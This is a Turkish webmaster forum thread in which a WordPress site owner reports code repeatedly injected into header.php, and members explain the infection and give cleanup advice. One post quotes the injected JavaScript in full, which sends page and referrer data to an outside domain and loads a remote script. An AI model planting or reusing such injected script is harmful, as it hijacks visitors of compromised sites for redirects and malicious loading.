• 26-01-2016, 01:15:18
    #10
    nasıl bir kod bende bakayım siteleri me
  • 26-01-2016, 01:19:00
    #11
    Root erişiminiz var ise maldet kurup taramayı deneyin yoksada barınma hizmeti aldığınız firmadan ricada bulunun
  • 26-01-2016, 01:36:34
    #12
    header.php şöyle bir kod ekleniyor

    Alıntı
    <script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://landbydean.com/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>
  • 26-01-2016, 02:42:15
    #13
    temanız ya da kullandığınız bir eklenti warezse olabilir.
  • 26-01-2016, 02:57:53
    #14
    iframe virüsü olarakta adlandılırılır bu virüs. FTP nize bir şekilde erişip dosya atmışlar. Shell ile siz silsenizde tekrar bağlanıp (tabiki otomatik botlar ile, manuel değil.) aynı anda ellerindeki tüm virüs bulaştırdıkları sitelere belirli aralıklar ile (12/24 saat) tekrar gönderiyorlar zararlı kodları.

    Bu virüs genelde fake hit için, spam mail atmak için, yönlendirme için kullanılır. Aynı zamanda kendini diğer klasörlere bulaştırır sürekli. FTP nizde saçma isimlerle klasörler, dosyalar görebilirsiniz.

    Google sitenizi zararlı olarak işaretleyebilir. En kötüsü de bu. En kısa sürede müdahale edilmelidir. Zararlı içerik işaretlenen site kolay kolay bir daha toparlamaz kendini.

    Ücretli olarak temizleyebilirim. Daha önce birçok kişiye yardımcı oldum forumda. iyi çalışmalar.
  • 26-01-2016, 03:18:23
    #15
    metinblog adlı üyeden alıntı: mesajı görüntüle
    header.php şöyle bir kod ekleniyor
    kullandıgınız sistem wordpress ise.

    sql dosyasını cpanelden zip olarak indir
    Ftp girip upland klasörünüzü komple pc ye indirin
    indirdiginiz dosyayı önce 3 4 tane virus programı ile tarayın gerekirse sonra tek tek bakın dosyalara uzatınısı .php veya .htm .html diye biten dosya varsa silin
    sonra siteyi komple silip tekrardan boş bir wordpress kurun sql dosyasını phpmyadmin den yükleyin ardından upland klasörünü tekrardan ftp ye atın.
    dikkat etmeniz gereken temanız warezde ordan bulaşmıştır farklı tema lisanslı tema bulun kullandıgınız eklentiler neler bilmedigim için genel yazıyorum..
    xxx eklenti var diyelim googlede o wp-content/plugins/eklenti ismi olarak arattın veya wp-content/plugins/eklenti "expolit" olarak arayın açık varsa muhtelen hack sitelerine düşmüştür kullandıgınız eklenti o eklentiyi kullanmayın.
    Egerki Host firmasından şüpheleniyorsanız dediklerimi yapmadan hosting firmasını degiştirip yapın
  • 26-01-2016, 22:02:42
    #16
    hyllet adlı üyeden alıntı: mesajı görüntüle
    kullandıgınız sistem wordpress ise.

    sql dosyasını cpanelden zip olarak indir
    Ftp girip upland klasörünüzü komple pc ye indirin
    indirdiginiz dosyayı önce 3 4 tane virus programı ile tarayın gerekirse sonra tek tek bakın dosyalara uzatınısı .php veya .htm .html diye biten dosya varsa silin
    sonra siteyi komple silip tekrardan boş bir wordpress kurun sql dosyasını phpmyadmin den yükleyin ardından upland klasörünü tekrardan ftp ye atın.
    dikkat etmeniz gereken temanız warezde ordan bulaşmıştır farklı tema lisanslı tema bulun kullandıgınız eklentiler neler bilmedigim için genel yazıyorum..
    xxx eklenti var diyelim googlede o wp-content/plugins/eklenti ismi olarak arattın veya wp-content/plugins/eklenti "expolit" olarak arayın açık varsa muhtelen hack sitelerine düşmüştür kullandıgınız eklenti o eklentiyi kullanmayın.
    Egerki Host firmasından şüpheleniyorsanız dediklerimi yapmadan hosting firmasını degiştirip yapın
    Teşekkür ederim
    Bu virüsün bilgisayardan bulaşma ihtimali var mı ?
  • 26-01-2016, 22:08:10
    #17
    metinblog adlı üyeden alıntı: mesajı görüntüle
    Teşekkür ederim
    Bu virüsün bilgisayardan bulaşma ihtimali var mı ?
    muhtemelen yoktur cünkü sadece siteye koy ekleme reklam ekleme yönlendirme yapmak için yazılmıştır tam dosyayı bilmedigim için net birşey söyliyemem
  • 26-01-2016, 22:09:45
    #18
    Aynı sorunla 1 ay mücadele ettim. Forumda kaç kişiye para ödedim hepsi parayı alıp hallettik dediler ama sorun devam etti. En sonunda @tedy (mention işini çözemedim hala; profil linki: https://www.r10.net/members/86417-tedy.html )arkadaşımız sorunu kalıcı olarak çözdü. Kendisini öneririm

    _
    Dosyaları indirip lisanslı eset ve kaspersky ile tarattım geri yükledim nafile. Sanırım bir adet "token" dosyası vardı kodu sürekli oraya ekleyip duran. 1 aydır kodla karşılaşmıyoruz, arkadaş halletiğinden bu yana.